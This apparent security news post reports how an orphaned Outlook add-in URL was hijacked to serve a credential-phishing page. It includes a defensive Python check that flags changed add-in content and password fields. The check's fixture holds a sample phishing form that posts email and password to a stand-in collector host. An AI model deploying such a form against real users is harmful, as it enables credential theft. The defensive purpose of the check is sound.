Cyber Web Spider Blog – News

Malicious Outlook Add-in Exposes 4,000 Accounts

Posted on February 12, 2026 By CWS

Malicious Outlook Add-in Compromises Accounts

In a significant cybersecurity breach, researchers have uncovered the first known case of a malicious Microsoft Outlook add-in being used to exploit users in real-world scenarios. This incident involved a compromised meeting scheduler add-in named AgreeTo, which was responsible for stealing over 4,000 Microsoft account credentials, credit card information, and responses to banking security questions.

Origins of the AgreeTo Add-in

Initially launched as a legitimate open-source project in December 2022, AgreeTo was available in the Microsoft Office Add-in Store. The tool, which served as a functional meeting scheduler, garnered positive reviews from users. However, its developer eventually abandoned the project and removed its associated Vercel deployment, leaving the add-in’s hosting URL orphaned and open for registration.

Seizing this opportunity, an attacker claimed the available URL and set up a phishing kit. Because the add-in remained listed in Microsoft’s store, the malicious phishing page was displayed directly in the trusted Outlook sidebar for users who had the add-in installed or downloaded it afresh.

Technical Vulnerabilities Exploited

The attack leveraged a flaw in the architecture of Office add-ins, which differ from traditional software in that they are ‘remote dynamic dependencies’: an add-in is essentially an XML manifest that points to a URL, which is loaded within an iframe. Microsoft reviewed the manifest during the initial submission but did not continuously verify the live content hosted at the approved URL. This allowed the attacker to replace the scheduling tool with a fake Microsoft login page without triggering a security review.

When users opened AgreeTo, they were prompted to log in and unknowingly sent their credentials and IP addresses to the attacker through a Telegram bot. The attacker also accessed banking details and security answers, targeting Canadian institutions.
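The review gap described above can be narrowed on the defender's side by re-checking what each approved add-in URL serves today. The following is an added example, not code from the article, Koi Security or Microsoft: it reads the SourceLocation URLs out of a manifest, compares the live content with a hash pinned at review time, and flags password fields in the pane. The manifest, host names and page bodies are constructed, and `fetch` is an injected function so the check runs offline.

```python
import hashlib
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed, simplified manifest for a hypothetical add-in (not AgreeTo's).
MANIFEST = """<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1">
  <DisplayName DefaultValue="Example Scheduler"/>
  <IconUrl DefaultValue="https://addin.example.invalid/icon.png"/>
  <FormSettings><Form><DesktopSettings>
    <SourceLocation DefaultValue="https://addin.example.invalid/pane.html"/>
  </DesktopSettings></Form></FormSettings>
</OfficeApp>"""

# Constructed page bodies: the content pinned at review time, and a later swap.
REVIEWED = b"<html><body><div id='calendar'>Pick a slot</div></body></html>"
SWAPPED = (b"<html><body><form action='https://collector.example.invalid/c'>"
           b"<input type='email'><input type='password'></form></body></html>")

def source_locations(manifest_xml):
    """URLs the host application loads into the add-in iframe."""
    root = ET.fromstring(manifest_xml)
    return [el.get("DefaultValue") for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "SourceLocation"]

class FormProbe(HTMLParser):
    """Counts password inputs, which a scheduler pane has no reason to render."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
    def handle_starttag(self, tag, attrs):
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.password_inputs += 1

def audit(manifest_xml, fetch, pinned):
    """Compare live content at each SourceLocation with the pinned SHA-256."""
    findings = []
    for url in source_locations(manifest_xml):
        body = fetch(url)  # injected so the check can run offline
        if hashlib.sha256(body).hexdigest() != pinned.get(url):
            findings.append((url, "content-changed-since-review"))
        probe = FormProbe()
        probe.feed(body.decode("utf-8", "replace"))
        if probe.password_inputs:
            findings.append((url, "password-field-in-addin-pane"))
    return findings

URL = "https://addin.example.invalid/pane.html"
PINNED = {URL: hashlib.sha256(REVIEWED).hexdigest()}
```

A hash mismatch alone also fires on legitimate updates, so treat it as a prompt to re-review the add-in rather than as proof of compromise.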

Implications and Response

Koi Security uncovered the campaign after identifying the attacker’s poorly secured exfiltration channel, from which it recovered the dataset of 4,000 victims. Although the add-in had permissions to read and modify emails, the primary focus of the attack was credential harvesting. Following the report, Microsoft removed the add-in from its store.

This incident underscores a critical supply chain risk, highlighting how trusted software can silently become malicious if its infrastructure is neglected. It serves as a stark reminder of the importance of continuous security verification in software management.
